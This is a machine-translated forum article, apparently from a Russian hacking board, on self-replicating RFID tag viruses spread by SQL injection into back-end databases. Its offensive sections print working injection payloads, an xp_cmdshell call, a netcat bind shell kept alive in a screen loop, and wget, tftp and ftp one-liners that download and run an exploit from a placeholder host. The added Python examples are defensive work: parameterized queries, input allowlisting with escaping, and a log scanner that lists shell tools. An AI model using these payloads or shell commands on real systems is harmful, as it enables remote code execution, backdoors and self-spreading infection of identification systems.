This page has been machine translated; typos may remain.

Viruses in RFID hacking: structure.


{Introduction}

This article is a follow-up on RFID hacking. The basics are set out in the first article at http://forum.antichat.ru/thread123511.html, from which we learned that RFID (Radio Frequency IDentification) is a method of storing and retrieving information remotely by transmitting radio signals to and from devices called RFID tags.

{About parasites}

The main functions of a virus in this type of attack are self-replication and the execution of arbitrary code. For both, the parasite usually relies on the back-end database, so the details depend on which database is used. Broadly, there are two classes of virus in this type of attack: the first uses arbitrary queries against the database, the second implements everything with quines (programs that output their own source).
What arbitrary code the virus can execute depends on how the database reacts to SQL injection.


{SQL injection}

Management systems usually look up the data read from an RFID tag in a database and return the result; with the right sequence of characters in the tag, that returned data can in turn be copied into other tags. This is how tags replicate themselves when certain conditions are met.

At present two types of virus can be considered: the first is a single-query program, the second uses multiple queries.
The single-query type takes up a minimum of space and cannot carry a payload in its structure; it is used only to write pre-planned information into the database. A virus that uses multiple queries, on the contrary, is built to infect auto-identification systems and to insert malicious code or another payload. The second method is used most often, but for this type of virus to work correctly certain conditions must be met in the database, namely that a GetCurrentQuery-style function is available to it. Care is needed here to avoid an error, since this API feature is what allows a comment to be inserted. (To reassure you, such functions are present in default installations of these systems.)

A concrete attack can be carried out when the database issues a query built from the tag contents, for example this one:
UPDATE ContainerContents SET OldContents = '%contents%' WHERE TagID = '%id%'

Here the %contents% and %id% variables are replaced with the values read from the tag.

If this query runs without errors, an attacker can alter it at will with the help of our favourite character, the single quote ('). And what does that allow? Adding a self-copying fragment to the NewContents field, which infects other systems in the same way.

Here is approximately what is needed as tag contents:
Apples', NewContents=SUBSTR(GetCurrentQuery(),43,57) --
which turns the query into:
UPDATE ContainerContents SET OldContents='Apples', NewContents=SUBSTR(GetCurrentQuery(),43,57) -- WHERE TagID='123'
Instead of updating only the OldContents field, the query now also updates the NewContents field, and because the SQL comment (--) removes the WHERE clause, every row in the table is affected. This opens up new opportunities for the attacker.
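The following is an added example, not code from the original article: it rebuilds the ContainerContents table in an in-memory SQLite database and runs the tag-driven UPDATE from the text in two ways, once built by textual substitution of %contents% and %id% (the vulnerable form) and once with bound parameters (the hardened form). The table rows, the hostile tag string and the helper names are constructed for this example; SQLite has no GetCurrentQuery(), so the hostile tag only plants a fixed marker in NewContents instead of copying the query.

```python
"""Tag contents flowing into an UPDATE: string substitution vs. bound parameters."""
import sqlite3

# Constructed sample tag reads.  The hostile one closes the string literal,
# adds a second assignment and comments out the WHERE clause, the same shape
# as the article's "Apples', NewContents=... --" payload.
HOSTILE_TAG = "Apples', NewContents='INJECTED' --"
BENIGN_TAG = "Apples"


def fresh_db():
    """Create the ContainerContents table with two constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ContainerContents "
               "(TagID TEXT PRIMARY KEY, OldContents TEXT, NewContents TEXT)")
    db.executemany("INSERT INTO ContainerContents VALUES (?, ?, ?)",
                   [("123", "Pears", "Pears"), ("456", "Grapes", "Grapes")])
    db.commit()
    return db


def update_vulnerable(db, tag_id, contents):
    """The article's query built by substituting %contents% and %id% as text.
    Because the tag contents become part of the SQL text, a quote in the tag
    changes the statement itself.  Returns the SQL actually executed."""
    sql = ("UPDATE ContainerContents SET OldContents = '%s' WHERE TagID = '%s'"
           % (contents, tag_id))
    db.execute(sql)
    db.commit()
    return sql


def update_safe(db, tag_id, contents):
    """Same update with bound parameters: the driver passes the tag contents
    as a value, so quotes and '--' are stored literally and never parsed."""
    db.execute("UPDATE ContainerContents SET OldContents = ? WHERE TagID = ?",
               (contents, tag_id))
    db.commit()


def snapshot(db):
    """Return {TagID: (OldContents, NewContents)} for inspection."""
    rows = db.execute("SELECT TagID, OldContents, NewContents "
                      "FROM ContainerContents ORDER BY TagID")
    return {tid: (old, new) for tid, old, new in rows}


def demo():
    """Apply the hostile tag to row 123 through both paths; return both end states."""
    vuln = fresh_db()
    update_vulnerable(vuln, "123", HOSTILE_TAG)
    safe = fresh_db()
    update_safe(safe, "123", HOSTILE_TAG)
    return snapshot(vuln), snapshot(safe)


if __name__ == "__main__":
    after_vuln, after_safe = demo()
    print("string substitution:", after_vuln)
    print("bound parameters:   ", after_safe)
```

In the substituted version both rows end up with NewContents set and the WHERE clause gone, which is exactly the "every row affected" effect described above; in the parameterized version only row 123 changes and its OldContents holds the hostile string as inert text.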

Insert malicious code.

With the injection technique described above, nothing can be executed other than database queries. However, once client-side scripting is enabled, the server automatically becomes vulnerable: scripts can be placed after the comment, where the database system ignores them.
The only thing to keep in mind when including code in the exploit is the third parameter of SUBSTR, which must match the length of the exploit.
Apples', NewContents=SUBSTR(GetCurrentQuery(),43,73) --<script>...</script>
In a more serious version that uses variables and inserts more than just one fixed script, it looks like this:
Apples'; UPDATE ContainerContents SET NewContents=NewContents || ''';' || GetCurrentQuery() || ';%payload%; --';%payload% --
Here the malicious code has to appear twice: the first copy is written into the database (self-replication), the second is executed.
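As an added example (not from the original article), here are the two defences a middleware developer would put in front of the script-after-the-comment case just described: an allowlist check on tag contents at ingestion, and HTML escaping whenever stored contents are rendered. The expected tag format (short product descriptions of at most 128 bytes), the function names validate_tag_contents, render_container_row and process_read, and the sample inputs are all constructed for this example.

```python
"""Ingestion-time allowlist and output-time escaping for RFID tag contents."""
import html
import re

MAX_TAG_BYTES = 128                              # assumed tag capacity
# Allowlist for a product description: letters, digits, space and a little
# punctuation.  Quotes, angle brackets, semicolons and '--' are all excluded,
# so neither SQL breakouts nor <script> tags pass this check.
ALLOWED = re.compile(r"^[A-Za-z0-9 ,.\-]*$")


def validate_tag_contents(contents):
    """Reject tag contents that do not look like a product description.
    Returns (ok, reason) so the caller can log why a read was dropped."""
    if len(contents.encode("utf-8")) > MAX_TAG_BYTES:
        return False, "too long"
    if not ALLOWED.match(contents):
        return False, "disallowed character"
    return True, ""


def render_container_row(tag_id, contents):
    """Render one container as an HTML table row.  Everything is escaped here,
    independently of validation, because stored data may predate the check or
    arrive through another path."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(tag_id, quote=True), html.escape(contents, quote=True))


def process_read(tag_id, contents, store):
    """Simulated middleware step: drop invalid reads, store valid ones, and
    always render through the escaping function.  Returns the HTML row for a
    stored read or None when the read was rejected."""
    ok, _reason = validate_tag_contents(contents)
    if not ok:
        return None
    store[tag_id] = contents
    return render_container_row(tag_id, contents)


if __name__ == "__main__":
    store = {}
    print(process_read("123", "Apples", store))
    print(process_read("124", "<script>alert(1)</script>", store))
    # Even if a script did reach storage, rendering neutralises it:
    print(render_container_row("124", "<script>alert(1)</script>"))
```

The two layers are deliberately independent: the allowlist keeps hostile strings out of the database in the first place, and escaping at render time means that a script which slipped in through a quoted comment, as in the payload above, is shown as text rather than executed by the browser.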

Currently, comments are supported in Oracle (OCI / iSQL*Plus), which provides GetCurrentQuery-style functionality given administrator privileges. PostgreSQL, MySQL and SQL Server also allow comments and multiple injected queries, and GetCurrentQuery-style functionality exists there too. However, for PostgreSQL and SQL Server no reliably working viruses have been created yet; everything has been limited to experimental development.


{A few examples of the malicious code entered}

System management functions provided by databases can be used to cause problems. For example, Microsoft SQL Server provides a shutdown function (the SHUTDOWN statement) that allows the database to be shut down from SQL.
Reading Database Data
In the query UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%', the substituted data can be used to query the database directly:
'|| (SELECT ...) ||'
Here the quotes perform the SQL injection and force the data to be interpreted as code. The || operator performs string concatenation, so the result of the chosen SELECT query is appended to the field in the database. The concatenation operator is needed to neutralise the surrounding quotes, i.e. our favourite character again.


{Execution of Shell commands via SQL injection}

SQL Server provides the xp_cmdshell procedure, which allows commands, malicious or otherwise, to be executed:
EXEC Master..xp_cmdshell 'commands';
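From the defender's side, the tag-borne payloads in this article all have a recognisable shape, so an added example (not part of the original article) follows: a small scanner that runs over RFID middleware read logs and flags tag contents containing quote breakouts, SQL comments, stacked statements, GetCurrentQuery(), xp_cmdshell, script tags, or the shell tools named in the sections below. The log line format, the reader and tag identifiers, the indicator names and the sample log lines are all constructed for this example.

```python
"""Indicator matching over constructed RFID middleware read logs."""
import re

# Each indicator: (name, compiled pattern).  These are heuristics for triage,
# not proof of compromise; a benign description could still trip one of them.
INDICATORS = [
    ("quote-breakout", re.compile(r"'")),                      # closes a literal
    ("sql-comment", re.compile(r"--|/\*")),                    # hides the tail
    ("stacked-statement", re.compile(r";\s*(update|insert|delete|exec)\b", re.I)),
    ("query-reflection", re.compile(r"getcurrentquery\s*\(", re.I)),
    ("cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("html-script", re.compile(r"<\s*script\b", re.I)),
    ("shell-tool", re.compile(r"\b(netcat|nc|wget|tftp|screen)\b", re.I)),
]

# Hypothetical log format: one read per line, contents in double quotes.
LOG_LINE = re.compile(r'^(?P<ts>\S+) reader=(?P<reader>\S+) tag=(?P<tag>\S+) '
                      r'contents="(?P<contents>.*)"$')


def classify(contents):
    """Return the sorted indicator names matching one tag's contents."""
    return sorted(name for name, pat in INDICATORS if pat.search(contents))


def scan_log(lines):
    """Parse log lines and return alerts as (timestamp, reader, tag, indicators).
    Unparseable lines are skipped; clean reads produce no alert."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        hits = classify(m.group("contents"))
        if hits:
            alerts.append((m.group("ts"), m.group("reader"), m.group("tag"), hits))
    return alerts


# Constructed sample log: two benign reads, then two reads shaped like the
# article's payloads (the xp_cmdshell argument is left as the page's
# placeholder 'commands').
SAMPLE_LOG = [
    '2024-05-01T08:00:01Z reader=dock-1 tag=123 contents="Apples"',
    '2024-05-01T08:00:02Z reader=dock-1 tag=124 contents="Pears, 20 kg"',
    '2024-05-01T08:00:03Z reader=dock-2 tag=125 '
    'contents="Apples\', NewContents=SUBSTR(GetCurrentQuery(),43,57) --"',
    '2024-05-01T08:00:04Z reader=dock-2 tag=126 '
    'contents="Apples\'; EXEC Master..xp_cmdshell \'commands\' --"',
]


if __name__ == "__main__":
    for ts, reader, tag, hits in scan_log(SAMPLE_LOG):
        print("%s reader=%s tag=%s indicators=%s" % (ts, reader, tag, ",".join(hits)))
```

A single quote in a read is the cheapest signal and also the noisiest; the combination of a quote with a comment marker or a stacked statement is what should page someone. Reads that trip the cmdshell or shell-tool indicators are worth correlating with process creation under the database service account.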

{Installing backdoors in the system}

To move around the system we need the following command:
netcat -lp1234|sh
where port 1234 will be listened on.

But here we face the danger of an installed and properly configured firewall. There is a solution: run the code in an infinite loop so that it works like a daemon, which in itself allows a more advanced backdoor to be built.
screen -dmS t bash -c "while [ true ]; do netcat -lp1234|sh; done"

{Other Features}

There are also other useful tools, such as wget, i.e. downloading a file over the network and storing it on the system.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
wget is usually not available on Windows systems; in that case tftp must be used.
tftp -i ip GET myexploit.exe & myexploit
You can also create a text file on the fly, as they say, using echo:
(echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit

{Conclusion}

This article described penetration of a vulnerable system by programming RFID tags. Here, of course, I have to warn you that all the material presented is for reference only. Given the complexity of carrying out this technique, namely creating the tag itself and programming it with malicious intent, it seems to me too difficult for the man in the street. So I warn those who know how but suffer from idleness: you should not test this information in practice.